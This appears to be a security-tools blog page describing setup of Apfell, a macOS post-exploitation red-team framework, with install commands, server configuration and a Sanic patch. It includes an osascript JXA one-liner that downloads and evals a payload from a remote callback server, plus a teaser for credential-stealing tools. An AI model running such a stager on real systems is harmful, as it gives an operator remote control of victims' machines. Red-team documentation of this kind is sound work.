Apfell is a macOS, post-exploit, red teaming framework built with python3 and JavaScript. It’s designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming. This is a work-in-progress as I have free time, so please bear with me.
Also Read Firebase – Tool To Exploiting Misconfigured Firebase Databases
git clone https://github.com/its-a-feature/Apfell
# The setup.sh will install postgres and pip3 install the requirements
cd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..
# -------- CONFIGURE SETTINGS HERE -----------
db_name = 'apfell_db'
db_user = 'apfell_user'
db_pass = 'super_secret_apfell_user_password'
server_ip = '127.0.0.1' # this will be used by the browser to callback here, edit this!
listen_port = '443'
listen_ip = '0.0.0.0' # IP to bind to for the server, 0.0.0.0 means all local IPv4 addresses
ssl_cert_path = './app/ssl/apfell-cert.pem'
ssl_key_path = './app/ssl/apfell-ssl.key'
use_ssl = True
sudo find / -type f -name "app.py"
to find the appropriate Sanic file to edit. In here, find the line that says protocol = request.transport._protocol
and edit it to be:if hasattr(request.transport, '_app_protocol'):
protocol = request.transport._app_protocol
else:
protocol = request.transport._protocol
python3 server.py
[2018-07-16 14:39:14 -0700] [28381] [INFO] Goin' Fast @ https://0.0.0.0:443
By default, the server will bind to 0.0.0.0 on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don’t actually browse to https://0.0.0.0:443 in your browser. Instead, you’ll browse to either https://localhost:443 if you’re on the same machine that’s running the server, or you can browse to any of the IPv4 addresses on the machine that’s running the server. You could also browse to the IP address you specified in server_ip = '192.168.0.119'
in the installation section.
osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('HTTP://192.168.0.119:8080/apfell-jxa')),$.NSUTF8StringEncoding)));"
Once you’ve logged into Apfell, you can access some additional help.
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…